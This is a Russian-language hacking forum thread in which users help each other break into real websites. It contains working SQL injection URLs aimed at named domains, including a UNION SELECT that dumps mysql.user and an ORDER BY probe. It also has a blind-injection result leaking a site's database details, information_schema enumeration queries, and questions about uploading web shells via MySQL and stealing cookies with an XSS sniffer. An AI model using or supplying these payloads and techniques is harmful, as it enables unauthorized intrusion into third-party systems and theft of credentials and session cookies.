Ваши вопросы по уязвимостям.

2 svesve

http://www.administrator.net.ru/?id=3[sql] blind sql

version : 5.0.37-community
database : administratornet_test
user : netadmin@localhost


есть таблица admin....

 

что за бд?

Подставил кавычку в поиске sql injection и выдало:

Fatal error: Cannot use object of type DB_Error as array in /home/domen/public_html/lus/script_php/send_msg.php on line 234

Что это за БД и где почитать про раскрутку иньекций в ней?

 

как искал таблицы?
понимаю что скриптом...за верный ответ сервера ты что принимал?

 

Sipt

select+table_name+from+information_schema.tables+limit+{N1-100},1
select+column_name+from+information_schema.columns+where+table_name=(таблица или sql хекc)+limit+{N1-100},1

 

http://ip-st.ru/txt.php?cat=-1%20union%20select%201,2,3,4,user,6,7,8,9%20from%20mysql.user--
Вот открыт mysql.user можно ли залить шелл и что нибудь на подобии, объясните пожалуйста, не разу не заливал охота научиться

 

так и не разобрался с лимитом

 

2 Assembler

http://forum.antichat.ru/thread104591.html

2 Svesve юзай прогу от SQLHACK-a Сипт4 там есть посимвольный брут..там запрос и ставь...

 

http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--

Неужели никто ничего не нашёл ?

 

Подставил кавычку в поиске sql injection и выдало:

Fatal error: Cannot use object of type DB_Error as array in /home/domen/public_html/lus/script_php/send_msg.php on line 234

Что это за БД и где почитать про раскрутку иньекций в ней?

 

2 $p01nt link please

 

Подскажите плиз,
Веб сервер расположен на сервере А
Мускул на сервере Б
то
если - выполнить скул запрос просмотра файла на сервере А -
будет выведен файл сервера А или Б ?
Заранее спасибо

 

думаю что с сервера А

 

Я тоже так думал... пока не столкнулся с тем что создавая файлы на сервере через вебшел залитый через мускул не вижу на веб сервере))) Вот и возник вопрос - а не лохонулся ли я)))

 

А хрен его знает.Скорее,mysql.Операторы-то на что?))Или ничего не работает ?

 

естественно с сервера на котором висит MySQL!

 

2 geezer.code хорошо пусть я буду не прав, тогда обьясните мне как мускул прочитает файл с сервера Б на котором находится если файл физически находится на сервере А?

 

никак. а какой именно файл?(может он есть и на сервере Б тоже?).
мускул может работать в контексте конкретной ОС, и читать файлы вы можете только в контексте той ОС где висит мускул.

 

Так и есть.

 

В таком случае еще такой вопрос, может кто то уже пробовал такой прикол:
На веб сервере картинки берутся из мускула.
Если вставить в мускул вместо картинки код вебшела - то на вебсервере выполнится пхп код? Правда картинка вставляется в BLOB , не заругается ли мускул если туда пхп код вставить?

 

У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\